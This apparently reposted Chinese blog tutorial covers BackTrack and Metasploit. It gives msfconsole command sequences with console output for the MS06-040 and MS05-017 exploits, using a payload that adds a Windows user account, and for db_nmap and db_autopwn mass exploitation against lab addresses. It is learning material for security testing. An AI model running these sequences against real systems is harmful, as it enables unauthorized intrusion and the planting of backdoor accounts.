BackTrack4-Final linux 系統(tǒng)
常用命令 :startx poweroff

BackTrack 4后使用了ubuntu 8.10 的系統(tǒng)，而且只能裝Debian的軟件包。 　　
2011年5月11日，BackTrack發(fā)布了最新的BackTrack5，基于ubuntu10.04 LTS(Long-Term Support) 內(nèi)核為Kernel 2.6.38。本版BackTrack對于無線安全的檢查能力更為強悍，當(dāng)然BackTrack不僅僅是用來戰(zhàn)爭駕駛，還集成了包括Metasploit等200多種安全檢查工具，此外眾多的RFID工具也是一個亮點。

Metasploit + ruby 漏洞發(fā)掘主要平臺

Metasploit安全測試工具 　　Metasploit是一款開源的安全漏洞檢測工具，同時Metasploit是免費的工具，因此安全工作人員常用Metasploit工具來檢測系統(tǒng)的安全性

例如使用ms06040這個漏洞，步驟如下（不唯一）： 　　
↓ show exploits //顯示可用的exploit，以BSD開頭的是針對BSD系統(tǒng)的ShellCode，以Linx開頭的是針對Linux系統(tǒng)的ShellCode，以CMD和WIN開頭的是針對Windows系統(tǒng)。　　
↓ info windows/smb/ms06_040_netapi //查看這個exploit的相關(guān)信息 　　
↓ use windows/smb/ms06_040_netapi //使用這個exploit 　　
↓ show options //顯示這個漏洞利用的參數(shù) 　　
↓ set RHOST 192.168.1.11 //設(shè)置遠(yuǎn)程主機地址這個參數(shù) 　　
↓ show targets //顯示exploit支持的操作系統(tǒng)類型　　
↓ set TARGET 0 //設(shè)置目標(biāo)為0所代表的那個操作系統(tǒng)類型　　
↓ show payloads //顯示與正在使用的漏洞利用兼容的有效負(fù)載,說白了Payload就是我們平時說的ShellCode,不同的系統(tǒng)對不同的ShellCode要求是不一樣。 　　
↓ set PAYLOAD windows/exec //設(shè)置有效載荷為執(zhí)行特定命令 　　
↓ show options //顯示相關(guān)參數(shù) 　　
↓ set CMD "et user hello world /add"nbsp; //設(shè)置要執(zhí)行的命令為添加一個帳號　　
↓ set //檢查環(huán)境設(shè)置 　　
↓ check //檢查目標(biāo)是否存在相關(guān)漏洞 　　
↓ exploit //檢查無誤后即可進行溢出了

// Metasploit 單一目標(biāo)溢出,需要用namp收集信息

msf > use exploit/windows/dcerpc/ms05_017_msmq
msf > set TARGET 0
TARGET => 0
msf exploit(ms05_017_msmq) > set PAYLOAD windows/exec
PAYLOAD => windows/exec
msf exploit(ms05_017_msmq) > set CMD net user test test123456789 /add
CMD => net user test? test123456789 /add
msf exploit(ms05_017_msmq) > set RHOST 192.168.1.245
msf exploit(ms05_017_msmq) > set HNAME ww-server2000
RHOST => 192.168.1.245
HNAME => ww-server2000
msf exploit(ms05_017_msmq) > exploit
[-] Exploit exception: The connection was refused by the remote host (192.168.1.245:2103).
[*] Exploit completed, but no session was created. //失敗

// Metasploit postgresql 自動溢出出現(xiàn)的問題

root@bt:~# /etc/init.d/postgresql-8.3 start
Starting PostgreSQL 8.3 database server: main* The PostgreSQL server failed to start. Please check the log output:
2011-10-30 20:58:27 EDT FATAL: could not load server certificate file "server.crt": No such file or directory

kate /etc/postgresql/8.3/main/postgresql.confkate /etc/postgresql/8.3/main/postgresql.conf

# - Security and Authentication -

#authentication_timeout = 1min # 1s-600s
#ssl = true # (change requires restart)
#ssl_ciphers = 'ALL:!ADH:!LOW:!EXP:!MD5:@STRENGTH' # allowed SSL ciphers
# (change requires restart)
#password_encryption = on
#db_user_namespace = off

root@bt:~# /etc/init.d/postgresql-8.3 start
Starting PostgreSQL 8.3 database server: main. #成功啟動 ssl = true ->#ssl = true 少了"#"

sudo su postgres -c psql ALTER USER postgres WITH PASSWORD '123456789';
sudo passwd -d postgres
sudo su postgres -c passwd
set RHOST 192.168.1.103

//Metasploit postgresql自動溢出命令
msf > /etc/init.d/postgresql-8.3 stop
[*] exec: /etc/init.d/postgresql-8.3 stop
msf > /etc/init.d/postgresql-8.3 start
[*] exec: /etc/init.d/postgresql-8.3 start
Starting PostgreSQL 8.3 database server: main.
msf > db_driver postgresql
[*] Using database driver postgresql
msf > db_connect postgres:"123456789"@127.0.0.1/metasploit
msf > set RHOST 192.168.1.103
RHOST => 192.168.1.103
msf > db_nmap 192.168.1.103
[*] Nmap: Starting Nmap 5.35DC1 ( http://nmap.org ) at 2011-10-30 22:03 EDT
[*] Nmap: Nmap scan report for 192.168.1.245
[*] Nmap: Host is up (0.0024s latency).
[*] Nmap: Not shown: 993 closed ports
[*] Nmap: PORT STATE SERVICE
[*] Nmap: 135/tcp open msrpc
[*] Nmap: 139/tcp open netbios-ssn
[*] Nmap: 445/tcp open microsoft-ds
[*] Nmap: 1025/tcp open NFS-or-IIS
[*] Nmap: 1026/tcp open LSA-or-nterm
[*] Nmap: 3372/tcp open msdtc
[*] Nmap: 3389/tcp open ms-term-serv
[*] Nmap: MAC Address: 00:0C:29:E7:8F:60 (VMware)
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 0.31 seconds
msf >db_autopwn -p -e -x -r -I 192.168.1.103
[-]
[-] Warning: The db_autopwn command is deprecated and will be removed in a future version.
[-] This code is not well maintained, crashes systems, and crashes itself.
[-]
[*] (49/50 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.1.103:445...
[*] (50/50 [0 sessions]): Launching exploit/windows/smb/timbuktu_plughntcommand_bof against 192.168.1.103:445...
[*] (50/50 [0 sessions]): Waiting on 40 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on

--------------------------------------------------------------------------
Metasploit sqlite3自動溢出命令
msf>load db_sqlite3
msf>db_create
msf>db_nmap 192.168.1.245
msf>db_autopwn -p -e -x -r -I 192.168.1.103

msf>db_autopwn -p -e -q

Hosts
=====

address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
192.168.1.103 00:0C:29:E7:A4:82
192.168.1.199 00:0C:29:E7:A4:84
192.168.1.245 00:0C:29:E7:8F:60 WW-SERVER2000 Microsoft Windows 2000 SP4 client

轉(zhuǎn)載于:https://www.cnblogs.com/Gemgin/archive/2013/06/13/3136223.html

總結(jié)

以上是生活随笔為你收集整理的网络安全：漏洞测试主要平台 BackTrack4+Metasploit+ruby的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。